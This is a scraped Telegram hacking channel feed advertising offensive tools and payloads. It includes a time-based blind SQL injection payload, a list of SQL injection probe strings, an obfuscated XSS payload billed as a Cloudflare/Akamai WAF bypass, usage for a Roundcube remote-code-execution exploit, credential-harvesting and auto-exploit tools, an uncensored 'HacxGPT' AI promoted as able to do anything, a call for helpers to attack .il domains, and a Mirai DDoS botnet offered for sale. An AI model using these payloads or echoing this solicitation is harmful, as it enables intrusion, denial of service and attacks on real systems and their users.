BugCod3
7.27K subscribers
333 photos
6 videos
7 files
442 links
[ BugCod3 ] β€” From Shadows To Shells ⚑️

πŸ•Ά Hacking | 🐞 Bug Bounty | πŸ” Security Tools
βš”οΈ Learn β€’ Hunt β€’ Dominate

πŸ‘₯ Group: T.me/BugCod3GP
πŸ“‚ Topic: T.me/BugCod3Topic

🌐 Web: BugCod3.com
πŸ€– Contact: T.me/BugCod3BOT
πŸ“§ Email: BugCod3@protonmail.com
Download Telegram
Happy Nowruz to all the world πŸ€™πŸ“Ώ
πŸ”₯7❀2⚑1πŸ‘1
Extracts URLs from OSINT Archives for Security Insights.

πŸ’¬
Urx is a command-line tool designed for collecting URLs from OSINT archives, such as the Wayback Machine and Common Crawl.

πŸ“Š Features:
βšͺ️ Fetch URLs from multiple sources (Wayback Machine, Common Crawl, OTX)
βšͺ️ Process multiple domains concurrently
βšͺ️ Filter results by file extensions or patterns
βšͺ️ Use presets (predefined filter sets) for convenience (like "no-image" to exclude all image-related extensions)
βšͺ️ Multiple output formats (plain, JSON, CSV)
βšͺ️ Output to console or file
βšͺ️ Support for reading domains from stdin (pipeline integration)
βšͺ️ URL testing capabilities (status checking, link extraction)

πŸ”Ό Installation:
cd urx
cargo build --release


πŸ’» Usage:
# Scan a single domain
urx example.com

# Scan multiple domains
urx example.com example.org

# Scan domains from a file
cat domains.txt | urx


Github

⬇️ Download
πŸ”’ BugCod3

#Osint #URL #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
❀10πŸ‘5πŸ”₯2⚑1
CF-Hero

πŸ’¬
CF-Hero is a comprehensive reconnaissance tool developed to discover the real IP addresses of web applications protected by Cloudflare. It performs multi-source intelligence gathering through various methods.

πŸ“Š Feautures:

βšͺ️ DNS Reconnaissance
βšͺ️ Third-party Intelligence
βšͺ️ Advanced Features

πŸ”Ό Installation:
go install -v github.com/musana/cf-hero/cmd/cf-hero@latest


πŸ’» Usage:
# The most basic running command. It checks A and TXT records by default.
cat domains.txt | cf-hero

# or you can pass "f" parameter to it.
cf-hero -f domains.txt

# Use the censys parameter to include Shodan in the scan
cat domain.txt | cf-hero -censys

# Use the shodan parameter to include Shodan in the scan
cat domain.txt | cf-hero -shodan

# Use the securitytrails parameter to include Shodan in the scan
cat domain.txt | cf-hero -securitytrails


Github

⬇️ Download
πŸ”’ BugCod3

#GO #Origin #IP #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
❀7⚑3πŸ‘2πŸ”₯2
Blind SQL Injection

Tips:
1. Gather all urls from gau/waybackurls and Google Dorking.
2. Inject SQLi payload in all parameters one by one.
3. Analyze the response.

Payload used:
0'XOR(if(now()=sysdate(),sleep(10),0)) XOR'Z

#BugBounty #Payload #SQLi
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
❀7πŸ”₯4⚑2
Useful Wireshark Filters

#WireShark #Tips
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
πŸ”₯5⚑2❀2
SQL injection ID parameter

?id=1' order by 1 --+
?id=1' and "a"="a"--+
?id=1' and database()="securtiy"--+
?id=1' and substring(database(),1,1)="a"--+
?id=1' and sleep(2) and "a"="a"--+
?id=1' and sleep(2) and substring(database(),1,1)="a"--+

#SQL #Injection #Tips
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
πŸ”₯5❀3⚑1
This media is not supported in your browser
VIEW IN TELEGRAM
How to use Gobuster to brute-force directories!

$ gobuster dir -u <target-URL> -w <wordlist>

dir: Directory scanning
-u: Target URL
-w: Path to wordlist file

⬇️ Download

#GoBuster #Tips #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ“£ T.me/BugCod3
πŸ“£ T.me/Exploit_Forge
πŸ”₯4❀3⚑1
WAF bypass for Akamai and Cloudflare

Payload:
<address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>



#WAF #Akamai #Cloudflare
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
1❀4⚑2πŸ”₯2
HacxGPT

The cutting-edge AI developed by BlackTechX, inspired by WormGPT, designed to push the boundaries of natural language processing.

🎯 Features:

βšͺ️ Powerful AI Conversations: all questions will be answered in goodflow.
βšͺ️ Broken AI: Can do anything you want !!

βš™οΈ Installation:
sudo apt-get update; apt-get upgrade -y
sudo apt-get install git wget python3 -y
cd Hacx-GPT
pip install -r requirements.txt
python3 main.py


Github

⬇️ Download
πŸ”’ BugCod3

#Ai #Hackers #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
❀4πŸ”₯3⚑2
CVE-2025-49113 - Roundcube Remote Code Execution

A proof-of-concept exploit for CVE-2025-49113, a remote code execution vulnerability in Roundcube Webmail.

πŸ’¬ Description:
This exploit targets a deserialization vulnerability in Roundcube Webmail versions 1.5.0 through 1.6.10. The vulnerability allows an authenticated attacker to execute arbitrary code on the server.

πŸ΄β€β˜ οΈ Vulnerable Versions:
βšͺ️ 1.5.0 - 1.5.9
βšͺ️ 1.6.0 - 1.6.10

πŸ–‡ Requirements:
βšͺ️ PHP 7.0 or higher
βšͺ️ cURL extension enabled
βšͺ️ Target running a vulnerable version of Roundcube

πŸ’» Usage:
php CVE-2025-49113.php <url> <username> <password> <command>


πŸ”Ό Example:
php CVE-2025-49113.php http://localhost/roundcube/ admin password "id"


Github

⬇️ Download
πŸ”’ BugCod3

#CVE #PHP #RemoteCode
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
⚑4❀3πŸ”₯3
Hi πŸ‘‹ , friends who want to help us in attacking the .il domain address can provide their type of help in the bot below and contact us.

T.me/BugCod3BOT
5πŸ”₯8
Networking Commands

#Network #Command
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
❀6πŸ”₯3⚑1
BadMod auto exploit tool

πŸ’¬ CMS auto detect and exploit.

πŸ’» Installation:
chmod +x INSTALL
./INSTALL


Github

⬇️ Download
πŸ”’ BugCod3

#PHP #Auto #Exploitation
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
❀4πŸ”₯4⚑2
Trape (stable) v2.0

πŸ’¬
Trape is an OSINT analysis and research tool, which allows people to track and execute intelligent social engineering attacks in real time. It was created with the aim of teaching the world how large Internet companies could obtain confidential information such as the status of sessions of their websites or services and control their users through their browser, without their knowledge, but It evolves with the aim of helping government organizations, companies and researchers to track the cybercriminals.

πŸ“Š Some benefits:
βšͺ️ LOCATOR OPTIMIZATION
βšͺ️ APPROACH
βšͺ️ REST API
βšͺ️ PROCESS HOOKS
βšͺ️ PUBLIC NETWORK TUNNEL
βšͺ️ CLICK ATTACK TO GET CREDENTIALS
βšͺ️ NETWORK
βšͺ️ PROFILE

πŸ’» Usage:
cd trape
pip3 install -r requirements.txt
python3 trape.py -h

#Example: python3 trape.py --url http://example.com --port 8080


Github

⬇️ Download
πŸ”’ BugCo3

#Python #Osint #Security #Tracking #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
πŸ”₯3❀2⚑1
GhostRecon

πŸ’¬
GhostRecon is a passive reconnaissance tool used in cybersecurity and web penetration testing that automates the discovery of subdomains, IP addresses, and ASN (Autonomous System Number) information for a target domain. It leverages publicly available data sources and OSINT techniques to streamline the information gathering process. Additionally, it can identify active IP addresses and detect the presence of Content Delivery Networks (CDNs) and Web Application Firewalls (WAFs) to support security analysis.

πŸ“Š What Recon Tool Does:
βšͺ️
Find All Subdomains
βšͺ️ Find All URLs ASN
βšͺ️ Fetching IP
βšͺ️ Identify Live IPs
βšͺ️ Detect CDN/WAF

To Buy: T.me/BugCod3BOT
❀4πŸ”₯3⚑1
Mirai DDoS source with botnet and all tools and peripherals for sale, urgent sale

To Buy: T.me/BugCod3BOT
πŸ”₯7
RFC-compliant payloads for email and phone number fields

#RFC #Payload
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
❀4πŸ”₯4⚑2
Burp Suite MCP Server Extension with scan and crawl features

πŸ’¬
This an extended MCP Server Extension for BurpSuite proxy with scan and crawl based on the original.
For Building instructions follow below the original README as provided from PortSwigger, for direct use, load the extension provided on your Burp proxy.

πŸ“Š Features:
βšͺ️ Connect Burp Suite to AI clients through MCP
βšͺ️ Automatic installation for Claude Desktop
βšͺ️ Comes with packaged Stdio MCP proxy server

πŸ’» Usage:
βšͺ️ Install the extension in Burp Suite
βšͺ️ Configure your Burp MCP server in the extension settings
βšͺ️ Configure your MCP client to use the Burp SSE MCP server or stdio proxy
βšͺ️ Interact with Burp through your client!

πŸ”Ό Installation:
Prerequisites
βšͺ️ Java
βšͺ️ Jar Command
cd burp-mcp
./gradlew embedProxyJar
#Open Burp Suite
#Access the Extensions Tab
#Add the Extension

Github

⬇️ Download
πŸ”’ BugCod3

#Burp #Suite #Extension
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
❀6⚑4πŸ”₯1🀣1
Revelar – Origin Reveal PRO

πŸ‘β€πŸ—¨ Overview:
Revelar (Origin Reveal PRO) is a professional Go-based CLI tool for uncovering real/origin IP addresses of websites behind CDNs such as Cloudflare, Akamai, Fastly, Imperva, and AWS CloudFront.

πŸ“Š Features:
βšͺ️ Detects CDN providers automatically.
βšͺ️ Collects DNS records (A, AAAA, MX, Reverse DNS).
βšͺ️ Extracts SSL Subject Alternative Names (SANs).
βšͺ️ Integrates with optional external tools (subfinder, amass, dnsx, httpx, nuclei).
βšͺ️ Filters CDN IP ranges to isolate real origin candidates.
βšͺ️ Active verification engine

πŸ”Ό Installation:
Install via go install:
go install github.com/MRvirusIR/Revelar@latest

or
cd Revelar
./Revelar -d example.com #For Run


πŸ’» Usage:
./Revelar -h


😸 Github

⬇️ Download
πŸ”’ BugCod3

#Revelar #CDN #Finder #RealIP #Discovery #Tool
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ“£ T.me/BugCod3
πŸ“£ T.me/RootAccessClub
Please open Telegram to view this post
VIEW IN TELEGRAM
10❀7⚑3πŸ”₯3πŸ†1
If this post gets support and a lot of reactions, we will prepare and create many more cool tools for you to use and enjoy. πŸ”₯
πŸ”₯13❀2